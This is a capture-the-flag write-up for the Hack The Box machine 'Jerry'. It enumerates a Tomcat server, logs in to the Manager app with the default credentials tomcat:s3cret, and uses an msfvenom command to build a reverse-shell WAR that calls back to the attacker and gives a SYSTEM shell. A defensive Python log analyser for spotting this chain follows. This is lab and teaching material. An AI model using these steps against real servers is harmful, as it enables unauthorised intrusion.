# Jerry

### Initial Enumeration

```bash
sudo nmap -T5 -p- -oN T-all 10.10.10.95
```

```bash
# Nmap 7.70 scan initiated Sat Jul  6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds
```

`Port 8080` hosted a default installation of `Apache Tomcat` (7.0.88). That release dates from May 2018, so `Searchsploit` returned no exploits for it.

```bash
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
```

```bash
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
```

The `/manager` path seemed the most interesting. When I hit the URL it asked for credentials, so I tried the default Tomcat credentials `tomcat:s3cret`, and they worked.

![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-Lj5LFLLpXjJfpPDYI8i%2F-Lj5MRW10pvg1SYHzQpC%2Fimage.png?alt=media\&token=c82759a3-46ad-4453-829b-01c77ae09ead)

### User Own & Root Own

The Manager application offered an option to deploy my own `WAR file`, so I built a reverse-shell WAR for the server with `msfvenom`.

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war
```

![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-Lj5LFLLpXjJfpPDYI8i%2F-Lj5Mg3s5ehLbiMPC0_4%2Fimage.png?alt=media\&token=5465358e-629f-4f2f-a25f-edbe2cccd94b)

I uploaded the WAR, and once its URL was requested I got a reverse shell as `NT AUTHORITY\SYSTEM`.

```
Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,598,893,056 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***

root.txt
04a8b***
```
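The chain above (anonymous 401s against `/manager`, a successful login with a default account, then a WAR upload) is exactly what a defender can pick out of Tomcat's own access log. As an added example that is not part of the original write-up, the following Python parses access-log lines in Tomcat's default `%h %l %u %t "%r" %s %b` format and reports those three events per client; the sample log lines are constructed, and the failure threshold and deploy path list are assumptions.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that install new code on the server (HTML UI and text API)
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines, failure_threshold=3):
    """Return (kind, client, detail) findings for Manager app activity:
    repeated 401s, the first authenticated request, and WAR deployments."""
    failures = defaultdict(int)
    logged_in = set()
    findings = []
    for line in lines:
        e = parse(line)
        if not e or not e["path"].startswith("/manager"):
            continue
        path = e["path"].split("?", 1)[0]          # strip the CSRF nonce query string
        status = int(e["status"])
        host = e["host"]
        if status == 401:
            failures[host] += 1
            if failures[host] == failure_threshold:   # report once per client
                findings.append(("manager_auth_failures", host, failures[host]))
        elif e["user"] != "-" and status < 400:
            if host not in logged_in:                # %u is set only after Basic auth succeeded
                logged_in.add(host)
                findings.append(("manager_login", host, e["user"]))
            if path in DEPLOY_PATHS and e["method"] in ("POST", "PUT"):
                findings.append(("war_deploy", host, path))
    return findings

# Constructed sample log (not captured from the box): three 401s, a login as tomcat,
# a WAR upload through the Manager UI, and unrelated traffic from another client.
SAMPLE_LOG = """\
10.10.14.7 - - [06/Jul/2019:13:30:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [06/Jul/2019:13:30:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [06/Jul/2019:13:30:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - tomcat [06/Jul/2019:13:30:14 +0000] "GET /manager/html HTTP/1.1" 200 19045
10.10.14.7 - tomcat [06/Jul/2019:13:31:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 200 20120
192.168.1.20 - - [06/Jul/2019:13:35:00 +0000] "GET /docs/ HTTP/1.1" 200 5000
"""

if __name__ == "__main__":
    for kind, client, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f"{kind:22} {client:15} {detail}")
```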

### Learning Outcome

Whenever you get a shell, check who you are before you start enumerating the server. In this case it took me quite a while to realise that I had been running with SYSTEM privileges from the very beginning.
